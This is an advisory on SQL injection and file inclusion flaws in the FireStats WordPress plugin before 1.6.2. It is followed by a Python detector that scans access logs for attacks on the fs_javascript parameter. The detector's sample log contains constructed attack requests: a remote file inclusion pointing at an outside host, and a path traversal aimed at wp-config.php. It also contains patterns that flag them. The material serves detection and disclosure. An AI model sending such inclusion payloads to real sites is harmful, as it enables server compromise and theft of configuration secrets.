Firestats Sql Injection And File Inclusion Vulnerabilities



FireStats SQL Injection and File Inclusion Vulnerabilities

Highly critical

Some vulnerabilities have been reported in the FireStats plugin for WordPress, which can be exploited by malicious people to conduct SQL injection attacks or to compromise a vulnerable system.

1) Input passed via unspecified parameters is not properly sanitised before being used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

2) Input passed via the "fs_javascript" parameter to wp-content/plugins/firestats/firestats-wordpress.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local or external resources.

The vulnerabilities are reported in versions prior to 1.6.2-stable.

Secunia advisories - http://secunia.com/advisories/35400/
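As an added detection example (not part of this post, the advisory, or the FireStats project), the following Python scans Apache-style access-log lines for requests to the firestats-wordpress.php endpoint whose fs_javascript value is anything other than a bare script filename, which is the shape a legitimate value for a script-include parameter would take. The log lines, IP addresses and the allowed-filename pattern are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines in Apache "combined" format; not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jun/2009:12:00:01 +0000] "GET /wp-content/plugins/firestats/firestats-wordpress.php?fs_javascript=firestats.js HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Jun/2009:12:00:02 +0000] "GET /wp-content/plugins/firestats/firestats-wordpress.php?fs_javascript=http://203.0.113.77/x.txt HTTP/1.1" 200 2048 "-" "curl/7.19"
203.0.113.9 - - [10/Jun/2009:12:00:03 +0000] "GET /wp-content/plugins/firestats/firestats-wordpress.php?fs_javascript=..%2F..%2Fwp-config.php HTTP/1.1" 200 1900 "-" "curl/7.19"
203.0.113.5 - - [10/Jun/2009:12:00:04 +0000] "GET /wp-content/plugins/firestats/firestats-wordpress.php?fs_javascript=counter.js HTTP/1.1" 200 300 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Jun/2009:12:00:05 +0000] "GET /wp-content/plugins/firestats/firestats-wordpress.php HTTP/1.1" 200 300 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Jun/2009:12:00:06 +0000] "GET /index.php HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Assumed legitimate shape: a bare .js filename with no directory component.
SAFE_VALUE = re.compile(r'^[A-Za-z0-9_\-]+\.js$')
TARGET_PATH = "wp-content/plugins/firestats/firestats-wordpress.php"


def classify_value(value):
    """Return a reason string if the value looks like an inclusion attempt, else None."""
    v = unquote(value)  # parse_qs already decoded once; this catches double-encoding
    if "://" in v:
        return "remote URL (remote file inclusion)"
    if ".." in v or "/" in v or "\\" in v:
        return "path traversal / local path"
    if "\x00" in v:
        return "null byte"
    if not SAFE_VALUE.match(v):
        return "unexpected value"
    return None


def find_inclusion_attempts(log_text):
    """Return one record per request whose fs_javascript value fails the allowlist."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith(TARGET_PATH):
            continue
        for value in parse_qs(parts.query).get("fs_javascript", []):
            reason = classify_value(value)
            if reason:
                hits.append({"ip": m.group("ip"), "time": m.group("ts"),
                             "value": unquote(value), "reason": reason,
                             "status": int(m.group("status"))})
    return hits


if __name__ == "__main__":
    for hit in find_inclusion_attempts(SAMPLE_LOG):
        print(hit)
```

On the sample above the first and fourth requests pass as ordinary script names and the two curl requests are flagged, one as a remote URL and one as path traversal; upgrading to 1.6.2-stable remains the fix, and this check only helps with triage of older logs.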
